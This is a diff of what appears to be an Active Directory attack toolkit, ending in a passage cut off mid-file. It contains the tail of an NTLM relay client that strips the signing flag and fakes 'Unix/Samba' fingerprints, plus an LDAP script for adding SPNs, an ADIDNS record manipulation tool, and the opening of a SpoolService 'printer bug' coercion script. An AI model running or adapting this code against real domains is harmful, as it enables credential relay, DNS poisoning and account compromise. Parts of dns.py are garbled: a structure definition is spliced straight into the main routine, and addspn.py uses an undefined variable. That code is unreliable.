self.sessionData = {} + + self.keepAliveHits = 1 + + def keepAlive(self): + # SMB Keep Alive more or less every 5 minutes + if self.keepAliveHits >= (250 / KEEP_ALIVE_TIMER): + # Time to send a packet + # Just a tree connect / disconnect to avoid the session timeout + tid = self.session.connectTree('IPC$') + self.session.disconnectTree(tid) + self.keepAliveHits = 1 + else: + self.keepAliveHits +=1 + + def killConnection(self): + if self.session is not None: + self.session.close() + self.session = None + + def initConnection(self): + self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, manualNegotiate=True) + #,preferredDialect=SMB_DIALECT) + if self.serverConfig.smb2support is True: + data = '\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00' + else: + data = '\x02NT LM 0.12\x00' + + if self.extendedSecurity is True: + flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES + else: + flags2 = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES + try: + packet = self.session.negotiateSessionWildcard(None, self.targetHost, self.targetHost, self.targetPort, 60, self.extendedSecurity, + flags1=SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS, + flags2=flags2, data=data) + except socketerror as e: + if 'reset by peer' in str(e): + if not self.serverConfig.smb2support: + LOG.error('SMBCLient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support') + else: + LOG.error('SMBCLient error: Connection was reset') + else: + LOG.error('SMBCLient error: %s' % str(e)) + return False + if packet[0] == '\xfe': + smbClient = MYSMB3(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), negPacket=packet) + else: + # Answer is SMB packet, sticking to SMBv1 + smbClient = MYSMB(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), negPacket=packet) + + self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, + existingConnection=smbClient, manualNegotiate=True) + + return True + + def setUid(self,uid): + self._uid = uid + + def sendNegotiate(self, negotiateMessage): + negotiate = NTLMAuthNegotiate() + negotiate.fromString(negotiateMessage) + #Remove the signing flag + negotiate['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN + + challenge = NTLMAuthChallenge() + if self.session.getDialect() == SMB_DIALECT: + challenge.fromString(self.sendNegotiatev1(negotiateMessage)) + else: + challenge.fromString(self.sendNegotiatev2(negotiateMessage)) + + # Store the Challenge in our session data dict. It will be used by the SMB Proxy + self.sessionData['CHALLENGE_MESSAGE'] = challenge + + return challenge + + def sendNegotiatev2(self, negotiateMessage): + v2client = self.session.getSMBServer() + + sessionSetup = SMB2SessionSetup() + sessionSetup['Flags'] = 0 + + # Let's build a NegTokenInit with the NTLMSSP + blob = SPNEGO_NegTokenInit() + + # NTLMSSP + blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] + blob['MechToken'] = str(negotiateMessage) + + sessionSetup['SecurityBufferLength'] = len(blob) + sessionSetup['Buffer'] = blob.getData() + + packet = v2client.SMB_PACKET() + packet['Command'] = SMB2_SESSION_SETUP + packet['Data'] = sessionSetup + + packetID = v2client.sendSMB(packet) + ans = v2client.recvSMB(packetID) + if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED): + v2client._Session['SessionID'] = ans['SessionID'] + sessionSetupResponse = SMB2SessionSetup_Response(ans['Data']) + respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer']) + return respToken['ResponseToken'] + + return False + + def sendNegotiatev1(self, negotiateMessage): + v1client = self.session.getSMBServer() + + smb = NewSMBPacket() + smb['Flags1'] = SMB.FLAGS1_PATHCASELESS + smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY + # Are we required to sign SMB? If so we do it, if not we skip it + if v1client.is_signing_required(): + smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE + + + sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) + sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() + sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() + + sessionSetup['Parameters']['MaxBufferSize'] = 65535 + sessionSetup['Parameters']['MaxMpxCount'] = 2 + sessionSetup['Parameters']['VcNumber'] = 1 + sessionSetup['Parameters']['SessionKey'] = 0 + sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE + + # Let's build a NegTokenInit with the NTLMSSP + # TODO: In the future we should be able to choose different providers + + blob = SPNEGO_NegTokenInit() + + # NTLMSSP + blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] + blob['MechToken'] = str(negotiateMessage) + + sessionSetup['Parameters']['SecurityBlobLength'] = len(blob) + sessionSetup['Parameters'].getData() + sessionSetup['Data']['SecurityBlob'] = blob.getData() + + # Fake Data here, don't want to get us fingerprinted + sessionSetup['Data']['NativeOS'] = 'Unix' + sessionSetup['Data']['NativeLanMan'] = 'Samba' + + smb.addCommand(sessionSetup) + v1client.sendSMB(smb) + smb = v1client.recvSMB() + + try: + smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) + except Exception: + LOG.error("SessionSetup Error!") + raise + else: + # We will need to use this uid field for all future requests/responses + v1client.set_uid(smb['Uid']) + + # Now we have to extract the blob to continue the auth process + sessionResponse = SMBCommand(smb['Data'][0]) + sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters']) + sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2']) + sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength'] + sessionData.fromString(sessionResponse['Data']) + respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob']) + + return respToken['ResponseToken'] + + def sendStandardSecurityAuth(self, sessionSetupData): + v1client = self.session.getSMBServer() + flags2 = v1client.get_flags()[1] + v1client.set_flags(flags2=flags2 & (~SMB.FLAGS2_EXTENDED_SECURITY)) + if sessionSetupData['Account'] != '': + smb = NewSMBPacket() + smb['Flags1'] = 8 + + sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) + sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters() + sessionSetup['Data'] = SMBSessionSetupAndX_Data() + + sessionSetup['Parameters']['MaxBuffer'] = 65535 + sessionSetup['Parameters']['MaxMpxCount'] = 2 + sessionSetup['Parameters']['VCNumber'] = os.getpid() + sessionSetup['Parameters']['SessionKey'] = v1client._dialects_parameters['SessionKey'] + sessionSetup['Parameters']['AnsiPwdLength'] = len(sessionSetupData['AnsiPwd']) + sessionSetup['Parameters']['UnicodePwdLength'] = len(sessionSetupData['UnicodePwd']) + sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE + + sessionSetup['Data']['AnsiPwd'] = sessionSetupData['AnsiPwd'] + sessionSetup['Data']['UnicodePwd'] = sessionSetupData['UnicodePwd'] + sessionSetup['Data']['Account'] = str(sessionSetupData['Account']) + sessionSetup['Data']['PrimaryDomain'] = str(sessionSetupData['PrimaryDomain']) + sessionSetup['Data']['NativeOS'] = 'Unix' + sessionSetup['Data']['NativeLanMan'] = 'Samba' + + smb.addCommand(sessionSetup) + + v1client.sendSMB(smb) + smb = v1client.recvSMB() + try: + smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) + except: + return None, STATUS_LOGON_FAILURE + else: + v1client.set_uid(smb['Uid']) + return smb, STATUS_SUCCESS + else: + # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials + clientResponse = None + errorCode = STATUS_ACCESS_DENIED + + return clientResponse, errorCode + + def sendAuth(self, authenticateMessageBlob, serverChallenge=None): + if unpack('B', str(authenticateMessageBlob)[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP: + # We need to wrap the NTLMSSP into SPNEGO + respToken2 = SPNEGO_NegTokenResp() + respToken2['ResponseToken'] = str(authenticateMessageBlob) + authData = respToken2.getData() + else: + authData = str(authenticateMessageBlob) + + if self.session.getDialect() == SMB_DIALECT: + token, errorCode = self.sendAuthv1(authData, serverChallenge) + else: + token, errorCode = self.sendAuthv2(authData, serverChallenge) + return token, errorCode + + def sendAuthv2(self, authenticateMessageBlob, serverChallenge=None): + v2client = self.session.getSMBServer() + + sessionSetup = SMB2SessionSetup() + sessionSetup['Flags'] = 0 + + packet = v2client.SMB_PACKET() + packet['Command'] = SMB2_SESSION_SETUP + packet['Data'] = sessionSetup + + # Reusing the previous structure + sessionSetup['SecurityBufferLength'] = len(authenticateMessageBlob) + sessionSetup['Buffer'] = authenticateMessageBlob + + packetID = v2client.sendSMB(packet) + packet = v2client.recvSMB(packetID) + + return packet, packet['Status'] + + def sendAuthv1(self, authenticateMessageBlob, serverChallenge=None): + v1client = self.session.getSMBServer() + + smb = NewSMBPacket() + smb['Flags1'] = SMB.FLAGS1_PATHCASELESS + smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY + # Are we required to sign SMB? If so we do it, if not we skip it + if v1client.is_signing_required(): + smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE + smb['Uid'] = v1client.get_uid() + + sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) + sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() + sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() + + sessionSetup['Parameters']['MaxBufferSize'] = 65535 + sessionSetup['Parameters']['MaxMpxCount'] = 2 + sessionSetup['Parameters']['VcNumber'] = 1 + sessionSetup['Parameters']['SessionKey'] = 0 + sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE + + # Fake Data here, don't want to get us fingerprinted + sessionSetup['Data']['NativeOS'] = 'Unix' + sessionSetup['Data']['NativeLanMan'] = 'Samba' + + sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob) + sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob + smb.addCommand(sessionSetup) + v1client.sendSMB(smb) + + smb = v1client.recvSMB() + + errorCode = smb['ErrorCode'] << 16 + errorCode += smb['_reserved'] << 8 + errorCode += smb['ErrorClass'] + + return smb, errorCode + + def getStandardSecurityChallenge(self): + if self.session.getDialect() == SMB_DIALECT: + return self.session.getSMBServer().get_encryption_key() + else: + return None diff --git a/kerbexec/exp/addspn.py b/kerbexec/exp/addspn.py new file mode 100644 index 0000000..9a7cdef --- /dev/null +++ b/kerbexec/exp/addspn.py @@ -0,0 +1,211 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2023 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# +# +# Add an SPN to a user/computer account via LDAP +# +#################### +import sys +import argparse +import random +import string +import getpass +import os +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS +from impacket.krb5.types import Principal +from impacket.krb5 import constants +from ldap3 import NTLM, Server, Connection, ALL, LEVEL, BASE, MODIFY_DELETE, MODIFY_ADD, MODIFY_REPLACE, SASL, KERBEROS +from lib.utils.kerberos import ldap_kerberos +import ldap3 +from ldap3.protocol.microsoft import security_descriptor_control + +def print_m(string): + sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string)) + +def print_o(string): + sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string)) + +def print_f(string): + sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string)) + +def main(): + parser = argparse.ArgumentParser(description='Add an SPN to a user/computer account') + parser._optionals.title = "Main options" + parser._positionals.title = "Required options" + + #Main parameters + parser.add_argument("host", metavar='HOSTNAME', help="Hostname/ip or ldap://host:port connection string to connect to") + parser.add_argument("-u", "--user", metavar='USERNAME', help="DOMAIN\\username for authentication") + parser.add_argument("-p", "--password", metavar='PASSWORD', help="Password or LM:NTLM hash, will prompt if not specified") + parser.add_argument("-t", "--target", metavar='TARGET', help="Computername or username to target (FQDN or COMPUTER$ name, if unspecified user with -u is target)") + parser.add_argument("-T", "--target-type", metavar='TARGETTYPE', choices=('samname','hostname','auto'), default='auto', help="Target type (samname or hostname) If unspecified, will assume it's a hostname if there is a . in the name and a SAM name otherwise.") + parser.add_argument("-s", "--spn", metavar='SPN', help="servicePrincipalName to add (for example: http/host.domain.local or cifs/host.domain.local)") + parser.add_argument("-r", "--remove", action='store_true', help="Remove the SPN instead of add it") + parser.add_argument("-c", "--clear", action='store_true', help="Clear, i.e. remove all SPNs") + parser.add_argument("-q", "--query", action='store_true', help="Show the current target SPNs instead of modifying anything") + parser.add_argument("-a", "--additional", action='store_true', help="Add the SPN via the msDS-AdditionalDnsHostName attribute") + parser.add_argument('-k', '--kerberos', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' + '(KRB5CCNAME) based on target parameters. If valid credentials ' + 'cannot be found, it will use the ones specified in the command ' + 'line') + parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter') + parser.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication ' + '(128 or 256 bits)') + + args = parser.parse_args() + + if not args.query and not args.clear: + if not args.spn: + parser.error("-s/--spn is required when not querying (-q/--query) or clearing (--clear)") + + #Prompt for password if not set + authentication = None + if not args.user or not '\\' in args.user: + print_f('Username must include a domain, use: DOMAIN\\username') + sys.exit(1) + domain, user = args.user.split('\\', 1) + if not args.kerberos: + authentication = NTLM + sasl_mech = None + if args.password is None: + args.password = getpass.getpass() + else: + TGT = None + TGS = None + try: + # Hashes + lmhash, nthash = args.password.split(':') + assert len(nthash) == 32 + password = '' + except: + # Password + lmhash = '' + nthash = '' + password = args.password + if 'KRB5CCNAME' in os.environ and os.path.exists(os.environ['KRB5CCNAME']): + domain, user, TGT, TGS = CCache.parseFile(domain, user, 'ldap/%s' % args.host) + if args.dc_ip is None: + kdcHost = domain + else: + kdcHost = options.dc_ip + userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value) + if not TGT and not TGS: + tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, args.aesKey, kdcHost) + elif TGT: + # Has TGT + tgt = TGT['KDC_REP'] + cipher = TGT['cipher'] + sessionKey = TGT['sessionKey'] + if not TGS: + # Request TGS + serverName = Principal('ldap/%s' % args.host, type=constants.PrincipalNameType.NT_SRV_INST.value) + TGS = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey) + else: + # Convert to tuple expected + TGS = (TGS['KDC_REP'], TGS['cipher'], TGS['sessionKey'], TGS['sessionKey']) + authentication = SASL + sasl_mech = KERBEROS + + controls = security_descriptor_control(sdflags=0x04) + # define the server and the connection + s = Server(args.host, get_info=ALL) + print_m('Connecting to host...') + c = Connection(s, user=args.user, password=args.password, authentication=authentication, sasl_mechanism=sasl_mech) + print_m('Binding to host') + # perform the Bind operation + if authentication == NTLM: + if not c.bind(): + print_f('Could not bind with specified credentials') + print_f(c.result) + sys.exit(1) + else: + ldap_kerberos(domain, kdcHost, None, userName, c, args.host, TGS) + print_o('Bind OK') + + if args.target: + targetuser = args.target + else: + targetuser = args.user.split('\\')[1] + + if ('.' in targetuser and args.target_type != 'samname') or args.target_type == 'hostname': + if args.target_type == 'auto': + print_m('Assuming target is a hostname. If this is incorrect use --target-type samname') + search = '(dnsHostName=%s)' % targetuser + else: + search = '(SAMAccountName=%s)' % targetuser + c.search(s.info.other['defaultNamingContext'][0], search, controls=controls, attributes=['SAMAccountName', 'servicePrincipalName', 'dnsHostName', 'msds-additionaldnshostname']) + + try: + targetobject = c.entries[0] + print_o('Found modification target') + except IndexError: + print_f('Target not found!') + return + + if args.remove: + operation = ldap3.MODIFY_DELETE + elif args.clear: + operation = ldap3.MODIFY_REPLACE + else: + operation = ldap3.MODIFY_ADD + + if args.query: + # If we only want to query it + print(targetobject) + return + + + if not args.additional: + if args.clear: + print_o('Printing object before clearing') + print(targetobject) + c.modify(targetobject.entry_dn, {'servicePrincipalName':[(operation, [])]}) + else: + c.modify(targetobject.entry_dn, {'servicePrincipalName':[(operation, [args.spn])]}) + else: + try: + host = args.spn.split('/')[1] + except IndexError: + # Assume this is the hostname + host = args.spn + c.modify(targetobject.entry_dn, {'msds-additionaldnshostname':[(operation, [host])]}) + + if c.result['result'] == 0: + print_o('SPN Modified successfully') + else: + if c.result['result'] == 50: + print_f('Could not modify object, the server reports insufficient rights: %s' % c.result['message']) + elif c.result['result'] == 19: + print_f('Could not modify object, the server reports a constrained violation') + if args.additional: + print_f('You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs ending on the domain FQDN)') + else: + print_f('You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)') + print_f('To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute') + else: + print_f('The server returned an error: %s' % c.result['message']) + + +if __name__ == '__main__': + main() diff --git a/kerbexec/exp/dns.py b/kerbexec/exp/dns.py new file mode 100644 index 0000000..08dc9a3 --- /dev/null +++ b/kerbexec/exp/dns.py @@ -0,0 +1,610 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# +# Tool to interact with ADIDNS over LDAP +# +#################### +import sys +import argparse +import getpass +import re +import os +import socket +from struct import unpack, pack +from impacket.structure import Structure +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS +from impacket.krb5.types import Principal +from impacket.krb5 import constants +from ldap3 import NTLM, Server, Connection, ALL, LEVEL, BASE, MODIFY_DELETE, MODIFY_ADD, MODIFY_REPLACE, SASL, KERBEROS +from lib.utils.kerberos import ldap_kerberos +import ldap3 +from impacket.ldap import ldaptypes +import dns.resolver +import datetime + +def print_m(string): + sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string)) + +def print_o(string): + sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string)) + +def print_f(string): + sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string)) + + + +class DNS_RECORD(Structure): + """ + dnsRecord - used in LDAP + [MS-DNSP] section 2.3.2.2 + """ + structure = ( + ('DataLength', 'L'), + ('Reserved', 'H'), + ('wRecordCount', '>H'), + ('dwFlags', '>L'), + ('dwChildCount', '>L'), + ('dnsNodeName', ':') + ) + +class DNS_RPC_RECORD_A(Structure): + """ + DNS_RPC_RECORD_A + [MS-DNSP] section 2.2.2.2.4.1 + """ + structure = ( + ('address', ':'), + ) + + def formatCanonical(self): + return socket.inet_ntoa(self['address']) + + def fromCanonical(self, canonical): + self['address'] = socket.inet_aton(canonical) + + +class DNS_RPC_RECORD_NODE_NAME(Structure): + """ + DNS_RPC_RECORD_NODE_NAME + [MS-DNSP] section 2.2.2.2.4.2 + """ + structure = ( + ('nameNode', ':', DNS_COUNT_NAME), + ) + +class DNS_RPC_RECORD_SOA(Structure): + """ + DNS_RPC_RECORD_SOA + [MS-DNSP] section 2.2.2.2.4.3 + """ + structure = ( + ('dwSerialNo', '>L'), + ('dwRefresh', '>L'), + ('dwRetry', '>L'), + ('dwExpire', '>L'), + ('dwMinimumTtl', '>L'), + ('namePrimaryServer', ':', DNS_COUNT_NAME), + ('zoneAdminEmail', ':', DNS_COUNT_NAME) + ) + +class DNS_RPC_RECORD_NULL(Structure): + """ + DNS_RPC_RECORD_NULL + [MS-DNSP] section 2.2.2.2.4.4 + """ + structure = ( + ('bData', ':'), + ) + +# Some missing structures here that I skipped + +class DNS_RPC_RECORD_NAME_PREFERENCE(Structure): + """ + DNS_RPC_RECORD_NAME_PREFERENCE + [MS-DNSP] section 2.2.2.2.4.8 + """ + structure = ( + ('wPreference', '>H'), + ('nameExchange', ':', DNS_COUNT_NAME) + ) + +# Some missing structures here that I skipped + +class DNS_RPC_RECORD_AAAA(Structure): + """ + DNS_RPC_RECORD_AAAA + [MS-DNSP] section 2.2.2.2.4.17 + [MS-DNSP] section 2.2.2.2.4.17 + """ + structure = ( + ('ipv6Address', '16s'), + ) + +class DNS_RPC_RECORD_SRV(Structure): + """ + DNS_RPC_RECORD_SRV + [MS-DNSP] section 2.2.2.2.4.18 + """ + structure = ( + ('wPriority', '>H'), + ('wWeight', '>H'), + ('wPort', '>H'), + ('nameTarget', ':', DNS_COUNT_NAME) + ) + +class DNS_RPC_RECORD_TS(Structure): + """ + DNS_RPC_RECORD_TS + [MS-DNSP] section 2.2.2.2.4.23 + """ + structure = ( + ('entombedTime', ' 0: + print_m('Found %d domain DNS zones:' % len(zones)) + for zone in zones: + print(' %s' % zone) + forestdns = 'CN=MicrosoftDNS,DC=ForestDnsZones,%s' % s.info.other['rootDomainNamingContext'][0] + zones = get_dns_zones(c, forestdns) + if len(zones) > 0: + print_m('Found %d forest DNS zones:' % len(zones)) + for zone in zones: + print(' %s' % zone) + return + + + target = args.record + if args.zone: + zone = args.zone + else: + # Default to current domain + zone = ldap2domain(domainroot) + + if not target: + print_f('You need to specify a target record') + return + + if target.lower().endswith(zone.lower()): + target = target[:-(len(zone)+1)] + + + searchtarget = 'DC=%s,%s' % (zone, dnsroot) + # print s.info.naming_contexts + c.search(searchtarget, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(target), attributes=['dnsRecord','dNSTombstoned','name']) + targetentry = None + for entry in c.response: + if entry['type'] != 'searchResEntry': + continue + targetentry = entry + + # Check if we have the required data + if args.action in ['add', 'modify', 'remove'] and not args.data: + print_f('This operation requires you to specify record data with --data') + return + + + # Check if we need the target record to exists, and if yes if it does + if args.action in ['modify', 'remove', 'ldapdelete', 'resurrect', 'query'] and not targetentry: + print_f('Target record not found!') + return + + + if args.action == 'query': + print_o('Found record %s' % targetentry['attributes']['name']) + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + # dr.dump() + print(targetentry['dn']) + print_record(dr, targetentry['attributes']['dNSTombstoned']) + continue + elif args.action == 'add': + # Only A records for now + addtype = 1 + # Entry exists + if targetentry: + if not args.allow_multiple: + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + if dr['Type'] == 1: + address = DNS_RPC_RECORD_A(dr['Data']) + print_f('Record already exists and points to %s. Use --action modify to overwrite or --allow-multiple to override this' % address.formatCanonical()) + return False + # If we are here, no A records exists yet + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_A() + record['Data'].fromCanonical(args.data) + print_m('Adding extra record') + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_ADD, record.getData())]}) + print_operation_result(c.result) + else: + node_data = { + # Schema is in the root domain (take if from schemaNamingContext to be sure) + 'objectCategory': 'CN=Dns-Node,%s' % s.info.other['schemaNamingContext'][0], + 'dNSTombstoned': False, + 'name': target + } + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_A() + record['Data'].fromCanonical(args.data) + record_dn = 'DC=%s,%s' % (target, searchtarget) + node_data['dnsRecord'] = [record.getData()] + print_m('Adding new record') + c.add(record_dn, ['top', 'dnsNode'], node_data) + print_operation_result(c.result) + elif args.action == 'modify': + # Only A records for now + addtype = 1 + # We already know the entry exists + targetrecord = None + records = [] + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + if dr['Type'] == 1: + targetrecord = dr + else: + records.append(record) + if not targetrecord: + print_f('No A record exists yet. Use --action add to add it') + targetrecord['Serial'] = get_next_serial(args.dns_ip, args.host, zone,args.tcp) + targetrecord['Data'] = DNS_RPC_RECORD_A() + targetrecord['Data'].fromCanonical(args.data) + records.append(targetrecord.getData()) + print_m('Modifying record') + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, records)]}) + print_operation_result(c.result) + elif args.action == 'remove': + addtype = 0 + if len(targetentry['raw_attributes']['dnsRecord']) > 1: + print_m('Target has multiple records, removing the one specified') + targetrecord = None + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + if dr['Type'] == 1: + tr = DNS_RPC_RECORD_A(dr['Data']) + if tr.formatCanonical() == args.data: + targetrecord = record + if not targetrecord: + print_f('Could not find a record with the specified data') + return + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_DELETE, targetrecord)]}) + print_operation_result(c.result) + else: + print_m('Target has only one record, tombstoning it') + diff = datetime.datetime.today() - datetime.datetime(1601,1,1) + tstime = int(diff.total_seconds()*10000) + # Add a null record + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_TS() + record['Data']['entombedTime'] = tstime + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, [record.getData()])], + 'dNSTombstoned': [(MODIFY_REPLACE, True)]}) + print_operation_result(c.result) + elif args.action == 'ldapdelete': + print_m('Deleting record over LDAP') + c.delete(targetentry['dn']) + print_operation_result(c.result) + elif args.action == 'resurrect': + addtype = 0 + if len(targetentry['raw_attributes']['dnsRecord']) > 1: + print_m('Target has multiple records, I dont know how to handle this.') + return + else: + print_m('Target has only one record, resurrecting it') + diff = datetime.datetime.today() - datetime.datetime(1601,1,1) + tstime = int(diff.total_seconds()*10000) + # Add a null record + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_TS() + record['Data']['entombedTime'] = tstime + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, [record.getData()])], + 'dNSTombstoned': [(MODIFY_REPLACE, False)]}) + print_o('Record resurrected. You will need to (re)add the record with the IP address.') + +if __name__ == '__main__': + main() diff --git a/kerbexec/exp/printerbug.py b/kerbexec/exp/printerbug.py new file mode 100644 index 0000000..a34b728 --- /dev/null +++ b/kerbexec/exp/printerbug.py @@ -0,0 +1,253 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# +# Triggers RPC call using SpoolService bug +# Credit for original POC goes to @tifkin_ +# +# Author: +# Dirk-jan Mollema (@_dirkjan) +# +#################### +import sys +import logging +import argparse +import codecs + +from impacket.examples.logger import ImpacketFormatter +from impacket import version +from impacket.dcerpc.v5 import transport, rprn +from impacket.dcerpc.v5.dtypes import NULL +import socket + +class PrinterBug(object): + KNOWN_PROTOCOLS = { + 139: {'bindstr': r'ncacn_np:%s[\pipe\spoolss]', 'set_host': True}, + 445: {'bindstr': r'ncacn_np:%s[\pipe\spoolss]', 'set_host': True}, + } + + 